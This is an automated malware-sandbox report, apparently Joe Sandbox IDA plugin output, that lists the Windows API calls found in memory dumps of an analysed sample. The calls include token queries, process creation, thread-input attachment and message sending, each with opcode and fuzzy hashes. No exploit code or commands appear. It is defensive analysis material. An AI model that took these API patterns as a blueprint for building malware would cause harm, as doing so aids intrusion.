                                                        • Instruction ID: 636b2f1f0184591dfa427f2d048c6fe5ed35192b1d0fd76cc360cb35a024b9c4
                                                        • Opcode Fuzzy Hash: 6154732999004b5db5ff43942a63344534911fb360694764b94798f4f7bbf27c
                                                        • Instruction Fuzzy Hash: 8D11D036200305AFDB25AF64DC05D7A77A8FF45354B80507AE90EDB2A0EB729855C7A0
                                                        APIs
                                                        • _free.LIBCMT ref: 00E72FB5
                                                          • Part of subcall function 00E6395C: __FF_MSGBANNER.LIBCMT ref: 00E63973
                                                          • Part of subcall function 00E6395C: __NMSG_WRITE.LIBCMT ref: 00E6397A
                                                          • Part of subcall function 00E6395C: RtlAllocateHeap.NTDLL(009B0000,00000000,00000001,00000001,00000000,?,?,00E5F507,?,0000000E), ref: 00E6399F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: AllocateHeap_free
                                                        • String ID:
                                                        • API String ID: 614378929-0
                                                        • Opcode ID: 204fe023ce9da9725dad825e267b295c0e7773a3e18fe5154cfa690bfb6f52ab
                                                        • Instruction ID: eeff62d91530157d8e8e22f2915d247527296c88a54e5b63c47e7a16f092cd19
                                                        • Opcode Fuzzy Hash: 204fe023ce9da9725dad825e267b295c0e7773a3e18fe5154cfa690bfb6f52ab
                                                        • Instruction Fuzzy Hash: BD113A32549211AFCB313B74BC046697BD4AF043A8F20E429F94CB6151CF36C840A790
                                                        APIs
                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00E805AC
                                                        • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00E805C7
                                                        • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00E805DD
                                                        • FreeLibrary.KERNEL32(?), ref: 00E80632
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                        • String ID:
                                                        • API String ID: 3137044355-0
                                                        • Opcode ID: ff5aace49a2ca5429832ea4cc0b4c5e593f37651daacfb7a8f65e5bc6d6c44ea
                                                        • Instruction ID: 2a20a6c13cc9ff7abb9d56b98c607a62d67fa9c3e1bd3f44c6a9fc7b7af65841
                                                        • Opcode Fuzzy Hash: ff5aace49a2ca5429832ea4cc0b4c5e593f37651daacfb7a8f65e5bc6d6c44ea
                                                        • Instruction Fuzzy Hash: 6E21A571900209EFEB60AF91DD88ADAB7B8EF40304F009469E51EB2410E771EA5DEF50
                                                        APIs
                                                        • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00E86733
                                                        • _memset.LIBCMT ref: 00E86754
                                                        • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00E867A6
                                                        • CloseHandle.KERNEL32(00000000), ref: 00E867AF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: CloseControlCreateDeviceFileHandle_memset
                                                        • String ID:
                                                        • API String ID: 1157408455-0
                                                        • Opcode ID: 0725a8f779791af6787730d27e9681dd16781f0b8896206bcab250638d8a922c
                                                        • Instruction ID: dd80a4eef6ccd49bd6f02f1da1ceb166dd622d9fe94e9cd077ef5d3d099f1e3d
                                                        • Opcode Fuzzy Hash: 0725a8f779791af6787730d27e9681dd16781f0b8896206bcab250638d8a922c
                                                        • Instruction Fuzzy Hash: 13110A719012287BE72067A5AC4DFEBBABCEF44764F1041AAF508F71D0D2714E848BA4
                                                        APIs
                                                          • Part of subcall function 00E7AA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00E7AA79
                                                          • Part of subcall function 00E7AA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00E7AA83
                                                          • Part of subcall function 00E7AA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E7AA92
                                                          • Part of subcall function 00E7AA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00E7AA99
                                                          • Part of subcall function 00E7AA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E7AAAF
                                                        • GetLengthSid.ADVAPI32(?,00000000,00E7ADE4,?,?), ref: 00E7B21B
                                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00E7B227
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00E7B22E
                                                        • CopySid.ADVAPI32(?,00000000,?), ref: 00E7B247
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
                                                        • String ID:
                                                        • API String ID: 4217664535-0
                                                        • Opcode ID: d257fdd24736c8aa0b6742256e62179174593b3d710c6c19e0cf02c97c4995d2
                                                        • Instruction ID: a20a46000b6f007757e931824080912316c0f2347a04723f3d7d152b4088e586
                                                        • Opcode Fuzzy Hash: d257fdd24736c8aa0b6742256e62179174593b3d710c6c19e0cf02c97c4995d2
                                                        • Instruction Fuzzy Hash: 1A11B271A05205AFCB049F58DC45FAFB7A9EF84308B14907DE546E7221E7329E45DB10
                                                        APIs
                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00E7B498
                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E7B4AA
                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E7B4C0
                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E7B4DB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        • Opcode ID: cfe5c98f898d41655e6f9cbb1a3c693b89fb6f5581a4bd9afaed8cbb0c4f383d
                                                        • Instruction ID: 79cd1b464f982c552bb79e42e2857a9bcad37a13aa82447984b377ac977ed14d
                                                        • Opcode Fuzzy Hash: cfe5c98f898d41655e6f9cbb1a3c693b89fb6f5581a4bd9afaed8cbb0c4f383d
                                                        • Instruction Fuzzy Hash: 5011487A900218FFDB11DFA9C881F9DBBB4FB08710F2080A1E614B7290E771AE11DB94
                                                        APIs
                                                          • Part of subcall function 00E5B34E: GetWindowLongW.USER32(?,000000EB), ref: 00E5B35F
                                                        • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00E5B5A5
                                                        • GetClientRect.USER32(?,?), ref: 00EBE69A
                                                        • GetCursorPos.USER32(?), ref: 00EBE6A4
                                                        • ScreenToClient.USER32(?,?), ref: 00EBE6AF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Client$CursorLongProcRectScreenWindow
                                                        • String ID:
                                                        • API String ID: 4127811313-0
                                                        • Opcode ID: 8d577873f1158e056b8cc1886ee4ce0f179eebddc98f0c45f9499b4ddc406bb8
                                                        • Instruction ID: 3086d9ae689d32246f0595aac98dd905afcbedf1be861edd24bffce682b5c6fe
                                                        • Opcode Fuzzy Hash: 8d577873f1158e056b8cc1886ee4ce0f179eebddc98f0c45f9499b4ddc406bb8
                                                        • Instruction Fuzzy Hash: 2A110631900029BFCB14DF94DC45DEE77B9EB09305F101865F902F7241E735AA9ADBA1
                                                        APIs
                                                        • GetCurrentThreadId.KERNEL32 ref: 00E87352
                                                        • MessageBoxW.USER32(?,?,?,?), ref: 00E87385
                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00E8739B
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00E873A2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                        • String ID:
                                                        • API String ID: 2880819207-0
                                                        • Opcode ID: 5637263c6649b355891eae8cd3ae233240a68ed233b5711c3fd5b3453a2d81ce
                                                        • Instruction ID: 061ebdc82abf718e405793ebfe863262044bdbec712808e125c2deb828973aa3
                                                        • Opcode Fuzzy Hash: 5637263c6649b355891eae8cd3ae233240a68ed233b5711c3fd5b3453a2d81ce
                                                        • Instruction Fuzzy Hash: 5411E572A08208AFC7019B689C05E9E7FADAB45354F144235F969F3261D771C90497A1
                                                        APIs
                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E5D1BA
                                                        • GetStockObject.GDI32(00000011), ref: 00E5D1CE
                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00E5D1D8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: CreateMessageObjectSendStockWindow
                                                        • String ID:
                                                        • API String ID: 3970641297-0
                                                        • Opcode ID: 1b6ebb250fa401f102ad9672beadcaaa24cab8f2c95bad1604306939a59f4cb8
                                                        • Instruction ID: 4bec5ea51c09e227fad5a631f54ee5df349f50bd27ac68c19c48ad8c692fd37b
                                                        • Opcode Fuzzy Hash: 1b6ebb250fa401f102ad9672beadcaaa24cab8f2c95bad1604306939a59f4cb8
                                                        • Instruction Fuzzy Hash: F211A172106909BFEB218F909D50EEABB6DFF08369F041126FE1562150C7329C65DBA0
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                        • String ID:
                                                        • API String ID: 3016257755-0
                                                        • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                        • Instruction ID: 834e9f65d2dd498e10d25c28440a0575bc024d198569debefef24333da119f86
                                                        • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                        • Instruction Fuzzy Hash: AF014C7200014EBBCF125E88DC018EE3F63FB183A4B589455FE2D69075D336CAB2AB81
                                                        APIs
                                                          • Part of subcall function 00E67A0D: __getptd_noexit.LIBCMT ref: 00E67A0E
                                                        • __lock.LIBCMT ref: 00E6748F
                                                        • InterlockedDecrement.KERNEL32(?), ref: 00E674AC
                                                        • _free.LIBCMT ref: 00E674BF
                                                        • InterlockedIncrement.KERNEL32(009D62D0), ref: 00E674D7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                        • String ID:
                                                        • API String ID: 2704283638-0
                                                        • Opcode ID: bd4d6d6a96b17f3563b1a0ab8859e54b5e79cfdb6c78c43edb3d8955e5d10172
                                                        • Instruction ID: 5cf08484ed67ce2c783460ad2d8f19e656f8111e8a292b121b6647fbe20a0429
                                                        • Opcode Fuzzy Hash: bd4d6d6a96b17f3563b1a0ab8859e54b5e79cfdb6c78c43edb3d8955e5d10172
                                                        • Instruction Fuzzy Hash: 9401DB3198A6119BC722AF65B40D76DBBA0BF0479CF196015F4A877680CF349941CFC2
                                                        APIs
                                                        • _memset.LIBCMT ref: 00EAE33D
                                                        • _memset.LIBCMT ref: 00EAE34C
                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00F03D00,00F03D44), ref: 00EAE37B
                                                        • CloseHandle.KERNEL32 ref: 00EAE38D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: _memset$CloseCreateHandleProcess
                                                        • String ID:
                                                        • API String ID: 3277943733-0
                                                        • Opcode ID: 80cc7f61ea046fd2419e9023ae0613876e104b5169e9eff3dc9749d76dd8c8e7
                                                        • Instruction ID: 232092511b0837699d672ec6ce8d3386b005aacd26fdc965f4004fd3c7619e11
                                                        • Opcode Fuzzy Hash: 80cc7f61ea046fd2419e9023ae0613876e104b5169e9eff3dc9749d76dd8c8e7
                                                        • Instruction Fuzzy Hash: 96F05EF154131CBFE2101B65AC45F777E9CEB05794F014431BE08EA1A2D3769E00A6A8
                                                        APIs
                                                          • Part of subcall function 00E5AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00E5AFE3
                                                          • Part of subcall function 00E5AF83: SelectObject.GDI32(?,00000000), ref: 00E5AFF2
                                                          • Part of subcall function 00E5AF83: BeginPath.GDI32(?), ref: 00E5B009
                                                          • Part of subcall function 00E5AF83: SelectObject.GDI32(?,00000000), ref: 00E5B033
                                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00EAEA8E
                                                        • LineTo.GDI32(00000000,?,?), ref: 00EAEA9B
                                                        • EndPath.GDI32(00000000), ref: 00EAEAAB
                                                        • StrokePath.GDI32(00000000), ref: 00EAEAB9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                        • String ID:
                                                        • API String ID: 1539411459-0
                                                        • Opcode ID: 31976b3094c64018bd9619058ac8c0564a0b8342631a497a216a899947fc9d5f
                                                        • Instruction ID: f952186012d5d951ee9b92a166c53933a15338f985c42b00d2cd4e6ba8e5ceb1
                                                        • Opcode Fuzzy Hash: 31976b3094c64018bd9619058ac8c0564a0b8342631a497a216a899947fc9d5f
                                                        • Instruction Fuzzy Hash: 66F0E232009259BBDB129F98AC0EFCE3F5ABF0A311F084221FE01740E187775516DBA9
                                                        APIs
                                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00E7C84A
                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00E7C85D
                                                        • GetCurrentThreadId.KERNEL32 ref: 00E7C864
                                                        • AttachThreadInput.USER32(00000000), ref: 00E7C86B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                        • String ID:
                                                        • API String ID: 2710830443-0
                                                        • Opcode ID: 45a5d667b71532ca0a9cbaa9ab9def40b94eb7913f80efff37d2a85d48037383
                                                        • Instruction ID: 9b67ad2d6b6fda2af11cc2582fa18b67af013189b1f8655f641d99a6224f030e
                                                        • Opcode Fuzzy Hash: 45a5d667b71532ca0a9cbaa9ab9def40b94eb7913f80efff37d2a85d48037383
                                                        • Instruction Fuzzy Hash: ABE065711452247AEB115BA3DC0DEDB7F1CEF057A1F008035B90DA4450C673D585D7E0
                                                        APIs
                                                        • GetCurrentThread.KERNEL32 ref: 00E7B0D6
                                                        • OpenThreadToken.ADVAPI32(00000000,?,?,?,00E7AC9D), ref: 00E7B0DD
                                                        • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00E7AC9D), ref: 00E7B0EA
                                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,00E7AC9D), ref: 00E7B0F1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: CurrentOpenProcessThreadToken
                                                        • String ID:
                                                        • API String ID: 3974789173-0
                                                        • Opcode ID: c19ddee8d2d76c7a7ad944377303e36443444e6aa3d1291994c7af518dd9d6a8
                                                        • Instruction ID: c2aa4d5f06595c5d84db8559b394fa606cb7805e741f0137bb1490276b8bda31
                                                        • Opcode Fuzzy Hash: c19ddee8d2d76c7a7ad944377303e36443444e6aa3d1291994c7af518dd9d6a8
                                                        • Instruction Fuzzy Hash: 86E04F32605211DFD7201FB65C0DF473BA9EF55795F018838A645E6040DB2684078760
                                                        APIs
                                                        • GetSysColor.USER32(00000008), ref: 00E5B496
                                                        • SetTextColor.GDI32(?,000000FF), ref: 00E5B4A0
                                                        • SetBkMode.GDI32(?,00000001), ref: 00E5B4B5
                                                        • GetStockObject.GDI32(00000005), ref: 00E5B4BD
                                                        • GetWindowDC.USER32(?,00000000), ref: 00EBDE2B
                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 00EBDE38
                                                        • GetPixel.GDI32(00000000,?,00000000), ref: 00EBDE51
                                                        • GetPixel.GDI32(00000000,00000000,?), ref: 00EBDE6A
                                                        • GetPixel.GDI32(00000000,?,?), ref: 00EBDE8A
                                                        • ReleaseDC.USER32(?,00000000), ref: 00EBDE95
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                        • String ID:
                                                        • API String ID: 1946975507-0
                                                        • Opcode ID: 908b0d6365de5df50177cb954b5f1a42358385e012c68fdc9ed85498c44a2e26
                                                        • Instruction ID: 29ea6f67d783d0d050ae9aae95a345928fea3ef5b585497447258cb90fb723c2
                                                        • Opcode Fuzzy Hash: 908b0d6365de5df50177cb954b5f1a42358385e012c68fdc9ed85498c44a2e26
                                                        • Instruction Fuzzy Hash: 4CE06D31108240AFDF211B65AC09FD93B11AB1133AF04C736FAB9B80E1D773898ACB11
                                                        APIs
                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00E7B2DF
                                                        • UnloadUserProfile.USERENV(?,?), ref: 00E7B2EB
                                                        • CloseHandle.KERNEL32(?), ref: 00E7B2F4
                                                        • CloseHandle.KERNEL32(?), ref: 00E7B2FC
                                                          • Part of subcall function 00E7AB24: GetProcessHeap.KERNEL32(00000000,?,00E7A848), ref: 00E7AB2B
                                                          • Part of subcall function 00E7AB24: HeapFree.KERNEL32(00000000), ref: 00E7AB32
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
